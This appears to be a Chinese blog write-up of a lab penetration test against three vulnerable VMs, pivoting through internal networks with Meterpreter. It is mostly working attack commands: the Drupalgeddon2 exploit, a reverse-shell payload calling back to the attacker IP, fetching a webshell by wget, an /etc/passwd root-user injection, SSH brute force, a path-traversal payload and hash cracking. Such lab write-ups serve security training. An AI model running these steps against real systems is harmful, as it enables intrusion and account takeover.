xXxYOLOxXx

xXxYOLOxXx

Pentest With Meterpreter

Posted on Edited on In

迟来的文章

渗透测试报告

2019/1/28 16:49:43

任务规划

规划区域:虚拟机中的三台服务器
测试目标:获取所有服务器的root权限

渗透目标

  • A1 hackNos(Ubuntu)
    IP.0:192.168.31.132
    IP.1:Unknown

  • A2 lin.security(Ubuntu)
    IP.0:Unknown
    IP.1:Unknown

  • A3 hackNos-2(Ubuntu)
    IP.0:Unknown

攻击方

  • B Attacker(Kali)
    IP.0:192.168.31.10

网络状况:
B能与A1进行网络通信
A1能与B和A2进行网络通信
A2能与A1进行网络通信

hackNos

端口扫描

用Nmap对目标A1进行端口扫描

nmap -sV -p 1-1000 -T 5 -v -A -n 192.168.31.132

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Nmap scan report for 192.168.31.132
Host is up (0.011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a5:a5:17:70:4d:be:48:ad:ba:64:c1:07:a0:55:03:ea (RSA)
|   256 f2:ce:42:1c:04:b8:99:53:95:42:ab:89:22:66:9e:db (ECDSA)
|_  256 4a:7d:15:65:83:af:82:a3:12:02:21:1c:23:49:fb:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web路径枚举

dirb http://192.168.31.132 -w

用dirb进行Web目录枚举

1
==> DIRECTORY: http://192.168.31.132/drupal/

发现Web服务中存在Drupal框架

漏洞利用

搜索得知Drupal框架存在RCE漏洞
git clone https://github.com/dreadlocked/Drupalgeddon2.git

尝试对A1使用Exploit

1
2
3
apt install ruby
gem install highline
ruby drupalgeddon2.rb http://192.168.31.132/drupal/

成功获取shell

权限提升

本地构造Webshell

1
weevely generate pass she.php

开启本地Web服务
python -m SimpleHTTPServer 8000 &

在A1上用wget获取WebShell
wget http://192.168.31.10:8000/she.php

连接WebShell
weevely http://192.168.31.132/drupal/she.php pass

查看系统信息

1
2
uname -a
Linux hackNos 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:01:15 UTC 2019 i686 i686 i686 GNU/Linux

生成Meterpreter后门程序并投放
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.10 LPORT=1234 -e x86/shikata_ga_nai -i 11 -f elf > msf.elf

利用WebShell上传后门程序
file_upload /root/software/msf.elf /var/www/html/drupal/msf.elf

使用MSF进行渗透攻击

1
2
3
4
5
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.31.10
set LPORT 1234
run

在A1的WebShell中运行后门程序

1
2
chmod +x msf.elf
./msf.elf

将meterpreter shell转为bash

1
2
meterpreter > shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

查看具有suid权限且属于root用户的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
find / -user root -perm -4000 -print 2>/dev/null
<pal$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper           
/usr/lib/openssh/ssh-keysign                          
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic              
/usr/lib/eject/dmcrypt-get-device                     
/usr/lib/snapd/snap-confine                           
/usr/lib/policykit-1/polkit-agent-helper-1            
/usr/bin/pkexec                                       
/usr/bin/newgidmap                                    
/usr/bin/gpasswd                                      
/usr/bin/sudo                                         
/usr/bin/newgrp                                       
/usr/bin/newuidmap                                    
/usr/bin/wget                                         
/usr/bin/passwd                                       
/usr/bin/chsh                                         
/usr/bin/chfn                                         
/bin/ping6                                            
/bin/umount                                           
/bin/ntfs-3g                                          
/bin/mount                                            
/bin/ping                                             
/bin/su                                               
/bin/fusermount

可以用wget命令提权

对/etc/passwd文件进行间接修改

1
2
3
4
5
hackNos: file_download /etc/passwd passwd
perl -le 'print crypt("hackforfun","addedsalt")'
    adWo3GnVnKzuU
echo 'test:adWo3GnVnKzuU:0:0::/root:/bin/bash' >> passwd
hackNos: wget http://192.168.31.10:8000/passwd -O /etc/passwd

在bash中切换账户

1
2
3
4
su test
hackforfun
id
    uid=0(root) gid=0(root) groups=0(root)

在Meterpreter查看A1的网络信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : enp0s3
Hardware MAC : 08:00:27:7d:4c:83
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.31.132
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe7d:4c83
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::a00:27ff:fe7d:4c83
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : enp0s8
Hardware MAC : 08:00:27:65:bd:8b
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.109
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe65:bd8b
IPv6 Netmask : ffff:ffff:ffff:ffff::

发现192.168.56.0网段

在Meterpreter中添加路由

1
2
3
4
5
6
7
8
9
run autoroute -s 192.168.56.0/24
run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.56.0       255.255.255.0      Session 1

在MSF中扫描内网网段

1
2
3
4
5
6
use auxiliary/scanner/discovery/arp_sweep 
set RHOSTS 192.168.56.0/24
set THREADS 20
run

[+] 192.168.56.103 appears to be up (CADMUS COMPUTER SYSTEMS)

发现内网机器A2

添加sock代理

1
2
3
use auxiliary/server/socks4a
set srvport 9999
run

修改Proxychain文件

1
2
vim /etc/proxychains.conf
    socks4 192.168.31.10 9999

lin.security

端口扫描

proxychains代理Nmap对A2进行端口扫描

proxychains nmap -sT -Pn -v -T5 -A 192.168.56.103

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
Nmap scan report for 192.168.56.103
Host is up (0.0048s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
|   256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_  256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      36117/tcp   mountd
|   100005  1,2,3      36311/udp   mountd
|   100005  1,2,3      50621/tcp6  mountd
|   100005  1,2,3      58468/udp6  mountd
|   100021  1,3,4      36071/udp   nlockmgr
|   100021  1,3,4      38529/tcp6  nlockmgr
|   100021  1,3,4      41451/udp6  nlockmgr
|   100021  1,3,4      41509/tcp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 04:02
Completed NSE at 04:02, 0.00s elapsed
Initiating NSE at 04:02
Completed NSE at 04:02, 0.00s elapsed
Initiating NSE at 04:02
Completed NSE at 04:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds

开放ssh服务与nfs服务

漏洞利用

NFS目录挂载
尝试在A1上挂载A2的/home/peter目录

1
2
3
4
5
6
7
8
9
10
11
12
apt-get install nfs-common
vim /etc/exports
    /share1 *(sync,ro) 192.168.56.103(sync,rw)
systemctl restart rpcbind
systemctl restart nfs
showmount -e 192.168.56.103
    Export list for 192.168.56.103:
    /home/peter *
mkdir /mnt/share1
mount -t nfs 192.168.56.103:/home/peter /mnt/share1
cd /mnt/share1
ls

挂载失败

RPCBind
未找到可以获取Shell的EXP

SSH

1
2
3
proxychains hydra -V -I -f -t 64 -L user -P pass ssh://192.168.56.103:22

[22][ssh] host: 192.168.56.103   login: bob   password: secret

获取账户"bob"

权限提升

在A1上用SSH登录A2,sudo提权,写入新root账户

1
2
3
4
5
6
7
8
9
10
11
12
ssh bob@192.168.56.103
sudo -i
secret
perl -le 'print crypt("hackforfun","addedsalt")'
    adWo3GnVnKzuU
echo 'test:adWo3GnVnKzuU:0:0::/root:/bin/bash' >> /etc/passwd
exit
exit
ssh test@192.168.56.103
hackforfun
uname -a
    Linux linsecurity 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

构造Meterpreter后门程序

msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=192.168.56.103 LPORT=2345 -e x86/shikata_ga_nai -i 11 -f elf > msf2.elf

将Meterpreter后门程序上传至A2
proxychians scp msf2.elf test@192.168.56.103:/root/msf2.elf

在A2上运行后门程序

1
2
chmod +X msf2.elf
./msf2.elf &
1
2
3
4
5
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.56.103
set LPORT 2345
run

成功获取Shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : enp0s3
Hardware MAC : 08:00:27:d8:9f:d6
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.103
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fed8:9fd6
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : enp0s8
Hardware MAC : 08:00:27:be:f1:93
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.156.5
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:febe:f193
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  4
============
Name         : docker0
Hardware MAC : 02:42:f4:43:ba:1b
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.17.0.1
IPv4 Netmask : 255.255.0.0

发现192.168.156.0网段

在Meterpreter中添加路由

1
2
3
4
5
6
7
8
9
10
run autoroute -s 192.168.156.0/24
run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.56.0       255.255.255.0      Session 1
   192.168.156.0      255.255.255.0      Session 2

在MSF中扫描内网网段

1
2
3
4
5
6
use auxiliary/scanner/discovery/arp_sweep 
set RHOSTS 192.168.156.0/24
set THREADS 20
run

[+] 192.168.156.6 appears to be up (CADMUS COMPUTER SYSTEMS)

发现内网机器A3

hackNos-2

端口扫描

proxychains nmap -sT -Pn -v -T5 -A 192.168.156.6

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Nmap scan report for 192.168.156.6
Host is up (0.00095s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:36:4e:71:6a:83:e2:c1:1e:a9:52:64:45:f6:29:80 (RSA)
|   256 b4:ce:5a:c3:3f:40:52:a6:ef:dc:d8:29:f3:2c:b5:d1 (ECDSA)
|_  256 09:6c:17:a1:a3:b4:c7:78:b9:ad:ec:de:8f:64:b1:7b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:D8:5B:21 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Netgear ReadyNAS device (RAIDiator 4.2.21 - 4.2.27) (94%), Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.5 (94%)

Web路径枚举

dirb http://192.168.156.6 -w

1
2
3
4
5
6
7
8
9
---- Scanning URL: http://192.168.156.6/ ----
+ http://192.168.156.6/index.html (CODE:200|SIZE:10918)                                                     
+ http://192.168.156.6/server-status (CODE:403|SIZE:278)                                                    
==> DIRECTORY: http://192.168.156.6/tsweb/                                                                  
                                                                                                            
---- Entering directory: http://192.168.156.6/tsweb/ ----
+ http://192.168.156.6/tsweb/index.php (CODE:301|SIZE:0)                                                    
==> DIRECTORY: http://192.168.156.6/tsweb/wp-admin/                                                         
==> DIRECTORY: http://192.168.156.6/tsweb/wp-content/

漏洞利用

使用wpscan针对wordpress进行扫描

proxychains wpscan --url http://192.168.156.6/tsweb/ --enumerate u

1
2
3
4
5
6
7
8
9
[i] User(s) Identified:

[+] user
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.156.6/tsweb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

发现存在用户user

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ wpscan --url http://192.168.156.6/tsweb/ --enumerate p

[i] Plugin(s) Identified:

[+] gracemedia-media-player
 | Location: http://192.168.156.6/tsweb/wp-content/plugins/gracemedia-media-player/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2013-07-21T15:09:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.156.6/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.156.6/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt

存在插件gracemedia-media-player

搜索得到相关EXP
wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

得到两条重要信息

  • rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
  • flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash

可以破解flag账户的密码

权限提升

使用john进行字典爆破

1
2
3
4
echo '$1$flag$vqjCxzjtRc7PofLYS2lWf/' > passwd
john --wordlist=/usr/share/wordlist/rockyou.txt --format=md5crypt-long passwd
john --show passwd
	topsecret

使用flag账户登入

1
2
proxychains ssh flag@192.168.156.6
topsecret

而登入时使用的是rbash,在进行操作时会很不方便,需要切换到bash

1
2
3
python -c 'import os; os.system("/bin/bash")'
perl -e 'exec "/bin/bash";'
awk 'BEGIN {system("/bin/bash")}'

以上三条命令均可

尝试直接sudo提权,失败

尝试在目标服务器内搜索信息
发现文件/var/backups/passbkp/md5-hash

1
2
cat /var/backups/passbkp/md5-hash
	$1$rohit$01Dl0NQKtgfeL08fGrggi0

得到rohit账户的密码

使用john破解密码

1
2
3
4
echo '$1$rohit$01Dl0NQKtgfeL08fGrggi0' > passwd2
john --wordlist=/usr/share/wordlist/rockyou.txt --format=md5crypt-long passwd2
john --show passwd2
	!%hack41

切换到rohit账户,并尝试sudo提权

1
2
3
4
5
6
su rohit
!%hack41
sudo -i
!%hack41
id
	uid=0(root) gid=0(root) groups=0(root)

内网渗透的几个思路

proxychains+meterpreter
在获取机器的权限之后,上传meterpreter后门,然后建立路由,再借以本机的socks代理服务来进行流量转发,但是需要注意免杀,以及控制的持续化。meterpreter的便利之处在于,可以建立路由然后便于MSF对于内网的直接渗透,以及附带的许多使用功能。

proxychains+earthworm
与meterpreter类似,但是只是上传一个流量转发工具而不是后门程序,所以可能不太会需要考虑到免杀这一方面,但是开启代理服务的话貌似还是有点危险的。而且如果进行多层渗透的话,可能需要相应的多搭几条代理路线,在操作时可能需要记下相应的信息。

nmap进行扫描最好带上-n来取消掉dns解析